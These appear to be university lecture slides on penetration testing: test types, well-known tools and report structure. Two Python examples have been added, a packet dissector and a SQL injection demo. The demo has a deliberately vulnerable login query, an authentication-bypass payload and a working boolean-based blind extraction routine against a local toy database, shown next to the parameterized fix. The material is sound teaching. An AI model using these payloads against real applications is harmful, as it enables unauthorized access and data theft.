05-PenTesting
Dr Faisal Khan
Pen Testing
• Penetration testing is the process of attempting to gain access to resources by the
means an attacker would use, rather than through the usernames, passwords and other
normal means of access that an authorised user is given.
• If the focus is on computer resources, then examples of a successful penetration
would be obtaining or subverting confidential documents, pricelists, databases and
other protected information.
• The main thing that separates a penetration tester from an attacker is permission.
The penetration tester will have permission from the owner of the computing
resources that are being tested and will be responsible to provide a report.
• The goal of a penetration test is to increase the security of the computing resources
being tested.
• In many cases, a penetration tester will be given user-level access; the goal is then
to elevate the privileges of that account, or to use other means to gain access to
additional information that a user of that level should not have access to.
• Some penetration testers are contracted to find one hole, but in many cases, they
are expected to keep looking past the first hole so that additional vulnerabilities
can be identified and fixed.
• It is important for the pen-tester to keep detailed notes about how the tests were
done so that the results can be verified and so that any issues that were
uncovered can be resolved.
• It’s important to understand that it is very unlikely that a pen-tester will find all
the security issues.
• As an example, an organization may have passed a penetration test done yesterday.
Today is Microsoft’s “Patch Tuesday”, and the patches released publicly disclose a
brand new vulnerability in some Exchange mail servers that were previously considered
secure; next month it will be something else.
• Maintaining a secure network and information resources requires constant
vigilance.
Types of Penetration Tests
• Penetration testing can consist of one or more of the following types of tests:
• White Box Tests
• A white box test is one in which the organization provides the penetration testers with
security information about its systems, such as network diagrams, source code or credentials,
to help them find vulnerabilities more efficiently.
• Blind Tests
• A blind test, also known as a black-box test, is one in which the organization provides the
penetration testers with no security information about the system being tested; they start
from the same position as an outside attacker. The goal is to expose vulnerabilities that
would not be detected otherwise.
• Double-Blind Tests
• A double-blind test, also known as a covert test, is one in which the organization not only
withholds security information from the penetration testers but also does not inform its own
security team of the test, so that detection and response are tested as well. Such tests are
typically tightly controlled by those managing them.
Types of Pentests continued..
• External Tests
• An external test is one in which penetration testers attempt to find
vulnerabilities remotely. Because of the nature of these types of tests,
they are performed on external-facing applications such as websites.
• Internal Tests
• An internal test is one in which the penetration testing takes place
within an organization’s premises. These tests typically focus on
security vulnerabilities that someone working from within an
organization could take advantage of.
Top Penetration Testing Software & Tools
• 1. Netsparker
• Netsparker Security Scanner is a popular automated web application security
scanner used in penetration testing. It can identify vulnerabilities ranging from
cross-site scripting to SQL injection, and can be run against websites, web
services and web applications.
• 2. Wireshark
• First released in 1998 as Ethereal 0.2.0, Wireshark is an award-winning network
protocol analyzer with hundreds of contributors. With it you can capture network
packets and decode (“dissect”) them protocol by protocol. The tool is open source
and available for Windows, Solaris, FreeBSD, Linux and other systems.
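What a packet analyzer such as Wireshark does with every captured frame is decode the protocol headers layer by layer. The following Python script is an added example, not part of the original slides and not Wireshark's code: it builds one constructed Ethernet/IPv4/TCP frame in memory, dissects it with the standard struct module, and verifies the IPv4 header checksum the way a dissector flags a corrupted header. The MAC addresses, IP addresses, ports and payload are made up for the example.

```python
import struct
from ipaddress import IPv4Address

TCP_FLAGS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
             (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]


def ip_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement sum over an IPv4 header.
    Over a header whose checksum field is zero it yields the checksum;
    over a correct header (checksum filled in) it yields 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_frame(payload: bytes) -> bytes:
    """Constructed sample: 10.0.0.5:43210 -> 10.0.0.80:80, TCP PSH|ACK (all values made up)."""
    eth = bytes.fromhex("66778899aabb") + bytes.fromhex("001122334455") + b"\x08\x00"  # dst, src, IPv4
    total_len = 20 + 20 + len(payload)
    ip_fields = [0x45, 0, total_len, 0x1234, 0x4000, 64, 6, 0,
                 IPv4Address("10.0.0.5").packed, IPv4Address("10.0.0.80").packed]
    ip = struct.pack("!BBHHHBBH4s4s", *ip_fields)
    ip_fields[7] = ip_checksum(ip)           # compute checksum with the field zeroed, then fill it in
    ip = struct.pack("!BBHHHBBH4s4s", *ip_fields)
    tcp = struct.pack("!HHIIBBHHH", 43210, 80, 1000, 2000, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def dissect(frame: bytes) -> dict:
    """Decode Ethernet -> IPv4 -> TCP and return the fields a dissector would display."""
    if len(frame) < 14:
        raise ValueError("frame too short for an Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    out = {"eth_dst": dst.hex(":"), "eth_src": src.hex(":"), "ethertype": ethertype}
    if ethertype != 0x0800:                  # only IPv4 is decoded here
        return out
    ip_start = 14
    if len(frame) < ip_start + 20:
        raise ValueError("frame too short for an IPv4 header")
    version, ihl = frame[ip_start] >> 4, (frame[ip_start] & 0x0F) * 4
    if version != 4 or ihl < 20:
        raise ValueError("malformed IPv4 header")
    ip_hdr = frame[ip_start:ip_start + ihl]
    (_, _, total_len, _, _, ttl, proto, _, src_ip, dst_ip) = struct.unpack("!BBHHHBBH4s4s", ip_hdr[:20])
    out.update(ip_src=str(IPv4Address(src_ip)), ip_dst=str(IPv4Address(dst_ip)), ttl=ttl,
               proto=proto, ip_checksum_ok=ip_checksum(ip_hdr) == 0)
    if proto != 6:                           # only TCP is decoded here
        return out
    tcp_start = ip_start + ihl
    sport, dport, seq, ack, off_res, flags, win, _, _ = struct.unpack(
        "!HHIIBBHHH", frame[tcp_start:tcp_start + 20])
    data_off = (off_res >> 4) * 4
    payload = frame[tcp_start + data_off:ip_start + total_len]
    out.update(tcp_sport=sport, tcp_dport=dport, seq=seq, ack=ack, window=win,
               tcp_flags=[name for bit, name in TCP_FLAGS if flags & bit], payload=payload)
    return out


if __name__ == "__main__":
    pkt = dissect(build_frame(b"GET / HTTP/1.1\r\n"))
    for key, value in pkt.items():
        print(f"{key:15} {value!r}")
```

The checksum check matters in practice: a capture taken on the sending host often shows "bad" IP/TCP checksums because the NIC fills them in after the capture point (checksum offload), which is why Wireshark lets you disable checksum validation.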
Top Penetration Testing Software & Tools
continued..
• 3. Metasploit
• Metasploit is the most widely used penetration testing framework in the world. It
bundles exploit modules, payloads and auxiliary scanners with the tooling needed to
verify vulnerabilities and manage security assessments, and its module library is
equally useful to defenders who need to reproduce an attack before building a detection.
• 4. BeEF
• BeEF stands for Browser Exploitation Framework. It is a pen testing tool focused on the
web browser: it “hooks” a victim browser through a JavaScript payload and then uses that
browser as a foothold for client-side attacks, including against mobile browsers.
• 5. John The Ripper Password Cracker
• Weak passwords are one of the most common vulnerabilities: attackers who obtain password
hashes can crack them offline and use the recovered credentials to enter sensitive systems.
John the Ripper is the essential password-cracking tool; it supports a wide range of hash
formats and attack modes (wordlist with mangling rules, incremental brute force). It is
free, open-source software.
Top Penetration Testing Software & Tools
continued..
• 6. W3af
• w3af (Web Application Attack and Audit Framework) is focused on finding and
exploiting vulnerabilities in web applications. Its plugins fall into three main
types: discovery (crawl) plugins that map the application’s URLs and parameters,
audit plugins that test each of those for security flaws, and attack plugins that
exploit what the audit plugins found.
• 7. Nessus
• Nessus is a vulnerability scanner that has been used in security testing for over
twenty years, and some 27,000 organizations use it worldwide. It is one of the most
widely used scanning tools on the market; in a penetration test it typically provides
the vulnerability inventory that manual exploitation then builds on.
• 8. SQLmap
• sqlmap is an open-source tool that automates detecting and exploiting SQL injection
flaws, up to and including taking over the database server. Supported database
platforms include MySQL, SQLite, Sybase, DB2, Access, MSSQL, PostgreSQL and Oracle.
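The SQL injection that Netsparker reports and sqlmap exploits is easiest to understand against a small vulnerable query. The following Python script is an added example, not code from sqlmap or from the original slides: it runs an in-memory SQLite database with a string-concatenated login query beside its parameterized fix, shows the classic authentication bypass, and then performs the boolean-based blind extraction that sqlmap automates, reading the admin password one character at a time through yes/no probes. The table, accounts and secret are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with one privileged account; the secret is made up."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "s3cr3t-Tok3n"), ("guest", "guest")])
    return con


def login_vulnerable(con, username: str, password: str) -> bool:
    """The flaw scanners report: user input pasted straight into the SQL text."""
    query = (f"SELECT 1 FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return con.execute(query).fetchone() is not None


def login_safe(con, username: str, password: str) -> bool:
    """The fix: bound parameters keep the data out of the SQL grammar entirely."""
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return con.execute(query, (username, password)).fetchone() is not None


ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_!@#$%"


def extract_blind(oracle, column="password", where="username='admin'", max_len=32) -> str:
    """Boolean-based blind extraction, the way sqlmap does it when the application only
    reveals 'logged in' or 'not logged in'. `oracle(payload)` submits the payload as the
    username and returns that one bit. Each probe is '... OR (subquery) -- ' so the
    injected condition decides the result and the rest of the query is commented out."""
    result = ""
    for pos in range(1, max_len + 1):
        probe = f"' OR (SELECT length({column}) FROM users WHERE {where}) >= {pos} -- "
        if not oracle(probe):            # no character at this position: value is complete
            break
        for ch in ALPHABET:
            probe = (f"' OR (SELECT substr({column},{pos},1) FROM users WHERE {where}) "
                     f"= '{ch}' -- ")
            if oracle(probe):
                result += ch
                break
        else:
            raise ValueError(f"character at position {pos} is not in ALPHABET")
    return result


if __name__ == "__main__":
    con = make_db()
    bypass = "' OR 1=1 -- "
    print("vulnerable login bypassed:", login_vulnerable(con, bypass, "x"))
    print("safe login bypassed:     ", login_safe(con, bypass, "x"))
    print("extracted via blind SQLi:", extract_blind(lambda p: login_vulnerable(con, p, "x")))
```

Against the parameterized version the first length probe already fails and extract_blind returns an empty string, which is the behaviour a scanner uses to decide the parameter is not injectable. sqlmap adds what this example leaves out: detection of the injection point, time-based and error-based techniques when no boolean oracle exists, and a binary search over the character range instead of a linear scan.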
Pen-Testing vs. Vulnerability
Assessment
• The two terms are related, but penetration testing has more of an emphasis on
gaining as much access as possible, while a vulnerability assessment places the
emphasis on identifying areas that are vulnerable to a computer attack.
• It is important to keep in mind that you are dealing with a ‘Test.’ A penetration
test is like any other test in the sense that it is a sampling of all possible systems
and configurations.
• Unless the contractor is hired to test only a single system, they will be unable to
identify and penetrate all possible systems using all possible vulnerabilities.
Why Perform Pen test
• There are a variety of reasons for performing a penetration test. One of the main
reasons is to find vulnerabilities and fix them before an attacker does.
• Sometimes, the IT department is aware of reported vulnerabilities but they need
an outside expert to officially report them so that management will approve the
resources necessary to fix them.
• Having a second set of eyes check out a critical computer system is a good
security practice. Testing a new system before it goes on-line is also a good idea.
• Another reason for a penetration test is to give the IT department at the target
company a chance to respond to an attack.
Find Holes Now Before
Somebody Else Does
• At any given time, attackers are employing any number of automated tools
and network attacks looking for ways to penetrate systems.
• Only a handful of those attackers will have access to 0-day exploits; most will be
using well-known attacks and exploits.
• Penetration testing provides IT management with a view of their network
from a malicious point of view.
• The goal is that the penetration tester will find ways into the network so that
they can be fixed before someone with less than honorable intentions
discovers the same holes.
• Report Problems to Management
• Verify Secure Configurations
• Security Training For Network Staff
• Discover Gaps In Compliance
• Testing New Technology
The Penetration Testing Report
• After performing a penetration test, compiling the results from the test into a
legible format is key.
• As many key decision makers are not overly technical, it is critically important to
have multiple sections to a report.
• One common structure for penetration testing reports is to include an Executive
Summary, a Management Summary that includes some high-level operational
details such as server IP addresses and what needs to be fixed immediately, and a
Technical Summary with very specific results and remediation suggestions.